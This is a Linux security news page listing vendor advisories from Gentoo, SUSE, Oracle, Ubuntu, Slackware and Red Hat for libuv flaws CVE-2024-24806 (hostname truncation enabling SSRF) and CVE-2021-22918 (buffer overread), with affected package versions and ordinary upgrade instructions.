Stay Secure with the Latest Linux Advisories
Refine advisories
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security advisories
We found 14 articles for you...
91
security advisoryGentoosecurity issueGentoo: GLSA-202501-05 libuv hostname truncation normal
A vulnerability has been discovered in libuv, where hostname truncation can lead to attacker-controlled lookups.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202501-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libuv: Hostname Truncation Date: January 23, 2025 Bugs: #924127 ID: 202501-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability has been discovered in libuv, where hostname truncation can lead to attacker-controlled lookups. Background ========== libuv is a multi-platform support library with a focus on asynchronous I/O. Affected packages ================= Package Vulnerable Unaffected -------------- ------------ ------------ dev-libs/libuv < 1.48.0 > = 1.48.0 Description =========== Multiple vulnerabilities have been discovered in libuv. Please review the CVE identifiers referenced below for details. Impact ====== The uv_getaddrinfo function in src/unix/getaddrinfo.c truncates hostnames to 256 characters before calling getaddrinfo. This behavior can be exploited to create addresses like 0x00007f000001, which are considered valid by getaddrinfo and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. Workaround ========== There is no known workaround at this time. Resolution ========== All libuv users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose "> =dev-libs/libuv-1.48.0" References ========== [ 1 ] CVE-2024-24806 https://nvd.nist.gov/vuln/detail/CVE-2024-24806 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202501-05 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to
Jan 23, 2025
Gentoo
100
security advisorymoderateupdateSUSE: 2024:4109-1 moderate security update for libuv addressing SSRF
* bsc#1219724 Cross-References: * CVE-2024-24806 . # Security update for libuv Announcement ID: SUSE-SU-2024:4109-1 Release Date: 2024-11-28T16:15:50Z Rating: moderate References: * bsc#1219724 Cross-References: * CVE-2024-24806 CVSS scores: * CVE-2024-24806 ( SUSE ): 5.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N * CVE-2024-24806 ( NVD ): 7.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L Affected Products: * Basesystem Module 15-SP5 * Basesystem Module 15-SP6 * openSUSE Leap 15.5 * openSUSE Leap 15.6 * SUSE Linux Enterprise Desktop 15 SP5 * SUSE Linux Enterprise Desktop 15 SP6 * SUSE Linux Enterprise High Performance Computing 15 SP5 * SUSE Linux Enterprise Micro 5.5 * SUSE Linux Enterprise Real Time 15 SP5 * SUSE Linux Enterprise Real Time 15 SP6 * SUSE Linux Enterprise Server 15 SP5 * SUSE Linux Enterprise Server 15 SP6 * SUSE Linux Enterprise Server for SAP Applications 15 SP5 * SUSE Linux Enterprise Server for SAP Applications 15 SP6 An update that solves one vulnerability can now be installed. ## Description: This update for libuv fixes the following issues: * CVE-2024-24806: Fixed improper Domain Lookup that potentially leads to SSRF attacks (bsc#1219724) ## Patch Instructions: To install this SUSE update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: * openSUSE Leap 15.5 zypper in -t patch SUSE-2024-4109=1 openSUSE-SLE-15.5-2024-4109=1 * openSUSE Leap 15.6 zypper in -t patch openSUSE-SLE-15.6-2024-4109=1 * SUSE Linux Enterprise Micro 5.5 zypper in -t patch SUSE-SLE-Micro-5.5-2024-4109=1 * Basesystem Module 15-SP5 zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP5-2024-4109=1 * Basesystem Module 15-SP6 zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP6-2024-4109=1 ## Package List: * openSUSE Leap 15.5 (aarch64 ppc64le s390x x86_64 i586) *libuv1-debuginfo-1.44.2-150500.3.5.1 * libuv1-1.44.2-150500.3.5.1 * libuv-debugsource-1.44.2-150500.3.5.1 * libuv-devel-1.44.2-150500.3.5.1 * openSUSE Leap 15.5 (x86_64) * libuv1-32bit-1.44.2-150500.3.5.1 * libuv1-32bit-debuginfo-1.44.2-150500.3.5.1 * openSUSE Leap 15.5 (aarch64_ilp32) * libuv1-64bit-debuginfo-1.44.2-150500.3.5.1 * libuv1-64bit-1.44.2-150500.3.5.1 * openSUSE Leap 15.6 (aarch64 ppc64le s390x x86_64) * libuv1-debuginfo-1.44.2-150500.3.5.1 * libuv1-1.44.2-150500.3.5.1 * libuv-debugsource-1.44.2-150500.3.5.1 * libuv-devel-1.44.2-150500.3.5.1 * openSUSE Leap 15.6 (x86_64) * libuv1-32bit-1.44.2-150500.3.5.1 * libuv1-32bit-debuginfo-1.44.2-150500.3.5.1 * SUSE Linux Enterprise Micro 5.5 (aarch64) * libuv-debugsource-1.44.2-150500.3.5.1 * libuv-devel-1.44.2-150500.3.5.1 * SUSE Linux Enterprise Micro 5.5 (aarch64 ppc64le s390x x86_64) * libuv1-debuginfo-1.44.2-150500.3.5.1 * libuv1-1.44.2-150500.3.5.1 * Basesystem Module 15-SP5 (aarch64 ppc64le s390x x86_64) * libuv1-debuginfo-1.44.2-150500.3.5.1 * libuv1-1.44.2-150500.3.5.1 * libuv-debugsource-1.44.2-150500.3.5.1 * libuv-devel-1.44.2-150500.3.5.1 * Basesystem Module 15-SP6 (aarch64 ppc64le s390x x86_64) * libuv1-debuginfo-1.44.2-150500.3.5.1 * libuv1-1.44.2-150500.3.5.1 * libuv-debugsource-1.44.2-150500.3.5.1 * libuv-devel-1.44.2-150500.3.5.1 ## References: * https://www.suse.com/security/cve/CVE-2024-24806.html * https://bugzilla.suse.com/show_bug.cgi?id=1219724 . Major libuv revision tackles SSRF vulnerability. Timely application of recommended updates is essential to avoid security threats.. SUSE Libuv Update, SSRF Security Fix, Moderate Severity Advisory, Linux Security Updates. . LinuxSecurity.com Team
Nov 28, 2024
SuSE
217
security advisorymoderatesecurity issueOracle Linux 9: ELSA-2024-4756 Moderate: libuv Security Update
The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network: . Oracle Linux Security Advisory ELSA-2024-4756 http://linux.oracle.com/errata/ELSA-2024-4756.html The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network: x86_64: libuv-1.42.0-2.el9_4.i686.rpm libuv-1.42.0-2.el9_4.x86_64.rpm libuv-devel-1.42.0-2.el9_4.i686.rpm libuv-devel-1.42.0-2.el9_4.x86_64.rpm aarch64: libuv-1.42.0-2.el9_4.aarch64.rpm libuv-devel-1.42.0-2.el9_4.aarch64.rpm SRPMS: http://oss.oracle.com/ol9/SRPMS-updates//libuv-1.42.0-2.el9_4.src.rpm Related CVEs: CVE-2024-24806 Description of changes: [1:1.42.0-2] - Backport fix for CVE-2024-24806 Resolves: RHEL-24791 _______________________________________________ El-errata mailing list
Jul 25, 2024
Oracle
217
security advisorymoderatesecurity fixOracle Linux 8 ELSA-2024-4247 Moderate: libuv Security Updates
The following updated rpms for Oracle Linux 8 have been uploaded to the Unbreakable Linux Network: . Oracle Linux Security Advisory ELSA-2024-4247 http://linux.oracle.com/errata/ELSA-2024-4247.html The following updated rpms for Oracle Linux 8 have been uploaded to the Unbreakable Linux Network: x86_64: libuv-1.41.1-2.el8_10.i686.rpm libuv-1.41.1-2.el8_10.x86_64.rpm libuv-devel-1.41.1-2.el8_10.i686.rpm libuv-devel-1.41.1-2.el8_10.x86_64.rpm aarch64: libuv-1.41.1-2.el8_10.aarch64.rpm libuv-devel-1.41.1-2.el8_10.aarch64.rpm SRPMS: http://oss.oracle.com/ol8/SRPMS-updates//libuv-1.41.1-2.el8_10.src.rpm Related CVEs: CVE-2024-24806 Description of changes: [1:1.41.1-2] - Backport fixes for CVE-2024-24806 Resolves: RHEL-24790 _______________________________________________ El-errata mailing list
Jul 05, 2024
Oracle
172
security advisoryremote attackmoderate severityUbuntu 23.10 USN-6666-1 Moderate: Libuv Hostname Truncation Issue
libuv could be made to truncate certain hostnames.. ========================================================================== Ubuntu Security Notice USN-6666-1 February 28, 2024 libuv1 vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 23.10 - Ubuntu 22.04 LTS - Ubuntu 20.04 LTS Summary: libuv could be made to truncate certain hostnames. Software Description: - libuv1: asynchronous event notification library Details: It was discovered that libuv incorrectly truncated certain hostnames. A remote attacker could possibly use this issue with specially crafted hostnames to bypass certain checks. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 23.10: libuv1 1.44.2-1ubuntu0.1 Ubuntu 22.04 LTS: libuv1 1.43.0-1ubuntu0.1 Ubuntu 20.04 LTS: libuv1 1.34.2-1ubuntu1.5 In general, a standard system update will make all the necessary changes. References: https://ubuntu.com/security/notices/USN-6666-1 CVE-2024-24806 Package Information: https://launchpad.net/ubuntu/+source/libuv1/1.44.2-1ubuntu0.1 https://launchpad.net/ubuntu/+source/libuv1/1.43.0-1ubuntu0.1 https://launchpad.net/ubuntu/+source/libuv1/1.34.2-1ubuntu1.5 . A security flaw identified in libuv poses risks to Ubuntu systems; users are advised to apply updates to mitigate possible hostname truncation exploitation.. libuv Vulnerability, Ubuntu Security Fixes, Hostname Attack Mitigation. . Severity: Important. LinuxSecurity.com Team
Feb 28, 2024
•Important
Ubuntu
99
security advisorymoderatesecurity updateSlackware 15.0: 2024-051-02 Moderate: Libuv Server-Side Request Forgery
New libuv packages are available for Slackware 15.0 and -current to fix a security issue. . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] libuv (SSA:2024-051-02) New libuv packages are available for Slackware 15.0 and -current to fix a security issue. Here are the details from the Slackware 15.0 ChangeLog: +--------------------------+ patches/packages/libuv-1.48.0-i586-1_slack15.0.txz: Upgraded. This update fixes a server-side request forgery (SSRF) flaw. Thanks to alex2grad for the heads-up. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-24806 (* Security fix *) +--------------------------+ Where to find the new packages: +-----------------------------+ Thanks to the friendly folks at the OSU Open Source Lab (https://osuosl.org/) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://www.slackware.com/ for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libuv-1.48.0-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libuv-1.48.0-x86_64-1_slack15.0.txz Updated package for Slackware -current: Updated package for Slackware x86_64 -current: MD5 signatures: +-------------+ Slackware 15.0 package: 168acaabcc67333e202fc3d9ac527d44 libuv-1.48.0-i586-1_slack15.0.txz Slackware x86_64 15.0 package: d6bf2ac93ed9649937755919a5233275 libuv-1.48.0-x86_64-1_slack15.0.txz Slackware -current package: fbcd398c4621d98839d041ec8632fc7f l/libuv-1.48.0-i586-1.txz Slackware x86_64 -current package: 08108e6e433d2af7c84a39415fffd64a l/libuv-1.48.0-x86_64-1.txz Installation instructions: +------------------------+ Upgrade the package as root: # upgradepkg libuv-1.48.0-i586-1_slack15.0.txz +-----+ . Recent updates to libuv for Slackware address a critical server-side request forgery vulnerability identified in version 15.0..libuv Security, Slackware Packages, SSRF Fix, Linux Updates. . Severity: Important. LinuxSecurity.com Team
Feb 20, 2024
•Important
Slackware
91
security advisorygentoolow severityGentoo: GLSA-202401-23 Low Severity: Libuv Buffer Overread Risk
A buffer overread vulnerability has been found in libuv.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202401-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: libuv: Buffer Overread Date: January 16, 2024 Bugs: #800986 ID: 202401-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A buffer overread vulnerability has been found in libuv. Background ========== libuv is a multi-platform support library with a focus on asynchronous I/O. Affected packages ================= Package Vulnerable Unaffected -------------- ------------ ------------ dev-libs/libuv < 1.41.1 > = 1.41.1 Description =========== libuv fails to ensure that a pointer lies within the bounds of a defined buffer in the uv__idna_toascii() function before reading and manipulating the memory at that address. Impact ====== The overread can result in information disclosure or application crash. Workaround ========== There is no known workaround at this time. Resolution ========== All libuv users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose "> =dev-libs/libuv-1.41.1" References ========== [ 1 ] CVE-2021-22918 https://nvd.nist.gov/vuln/detail/CVE-2021-22918 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202401-23 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to
Jan 16, 2024
•Low
Gentoo
98
security advisorysecurity updateRed HatRed Hat Enterprise Linux 8: RHSA-2021:3075-01 Low: libuv Info Disclosure
An update for libuv is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Low: libuv security update Advisory ID: RHSA-2021:3075-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:3075 Issue date: 2021-08-10 CVE Names: CVE-2021-22918 ==================================================================== 1. Summary: An update for libuv is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64 3. Description: libuv is a multi-platform support library with a focus on asynchronous I/O. Security Fix(es): * libuv: out-of-bounds read in uv__idna_toascii() can lead to information disclosures or crashes (CVE-2021-22918) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1979338 - CVE-2021-22918 libuv: out-of-bounds read in uv__idna_toascii() can lead to informationdisclosures or crashes 6. Package List: Red Hat Enterprise Linux AppStream (v. 8): Source: libuv-1.41.1-1.el8_4.src.rpm aarch64: libuv-1.41.1-1.el8_4.aarch64.rpm libuv-debuginfo-1.41.1-1.el8_4.aarch64.rpm libuv-debugsource-1.41.1-1.el8_4.aarch64.rpm ppc64le: libuv-1.41.1-1.el8_4.ppc64le.rpm libuv-debuginfo-1.41.1-1.el8_4.ppc64le.rpm libuv-debugsource-1.41.1-1.el8_4.ppc64le.rpm s390x: libuv-1.41.1-1.el8_4.s390x.rpm libuv-debuginfo-1.41.1-1.el8_4.s390x.rpm libuv-debugsource-1.41.1-1.el8_4.s390x.rpm x86_64: libuv-1.41.1-1.el8_4.i686.rpm libuv-1.41.1-1.el8_4.x86_64.rpm libuv-debuginfo-1.41.1-1.el8_4.i686.rpm libuv-debuginfo-1.41.1-1.el8_4.x86_64.rpm libuv-debugsource-1.41.1-1.el8_4.i686.rpm libuv-debugsource-1.41.1-1.el8_4.x86_64.rpm Red Hat CodeReady Linux Builder (v. 8): aarch64: libuv-debuginfo-1.41.1-1.el8_4.aarch64.rpm libuv-debugsource-1.41.1-1.el8_4.aarch64.rpm libuv-devel-1.41.1-1.el8_4.aarch64.rpm ppc64le: libuv-debuginfo-1.41.1-1.el8_4.ppc64le.rpm libuv-debugsource-1.41.1-1.el8_4.ppc64le.rpm libuv-devel-1.41.1-1.el8_4.ppc64le.rpm s390x: libuv-debuginfo-1.41.1-1.el8_4.s390x.rpm libuv-debugsource-1.41.1-1.el8_4.s390x.rpm libuv-devel-1.41.1-1.el8_4.s390x.rpm x86_64: libuv-debuginfo-1.41.1-1.el8_4.i686.rpm libuv-debuginfo-1.41.1-1.el8_4.x86_64.rpm libuv-debugsource-1.41.1-1.el8_4.i686.rpm libuv-debugsource-1.41.1-1.el8_4.x86_64.rpm libuv-devel-1.41.1-1.el8_4.i686.rpm libuv-devel-1.41.1-1.el8_4.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2021-22918 https://access.redhat.com/security/updates/classification/#low 8. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPGv1 iQIVAwUBYRKHF9zjgjWX9erEAQgFSg/9G7tl+zmuvPat250k5lMMjMAjXEORullZ 2BLXDewnevV/kWxe4+GkRdG97GYtC8qpWoGnfq0zZoZKgP1Jd5KdYl6kZWDZ5I0W h2IDewyI84nKVF/rOHXFIssCdIDDRsyNH22x9C29AxkVeAtkGILKzFg/syjjhPNl 5joJquPNwOp3a/7zD1BEjROMAoZERm7EEjEeVbpY+bX7FiVlZws9gCnfmL6eLKoR cfjQB+JSesJN1XK0QX5iisVrM3LXu3NSPKH1tzgZwjuw7GwSukuqW5hEWfaey/0v JBsv8zUJ7zPaJIFCZGM8ic90GWVDzF7hDH4qMcygSHTRGb7QqoZoq8juzDeVPUfA iT0CJr5Qejhsioykoydhn/2RTG9RHaIkHsQNO371ltsa7wRVIKNhffa5JbbhHiXn 87OF8JbEM89ei23lls8NHVeg+5WxZH7iO8Ef1Vu5QcG9vL0pq5F5Krjz7wcaTZG0 o1TayLV2mMaAJwE8uBBtr3meh1uoGk0crQYThr9OHvlL3Gfd0MQyRP0NNkhP0DS4 p6r3ogDxGDqiDRgWBRheNDLrCfwd/69KqvqidV5AH7CVo+YcI5J2WkFu4fQZbTiy grKhy9zeiyukKIpPL5ohmle1EYSEKcgBw+fxJI0XTF6CzmCtmJGRS+e5xulJly5+ qvzHYz1a8Sw=yxIS -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Aug 10, 2021
•Low
Red Hat
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!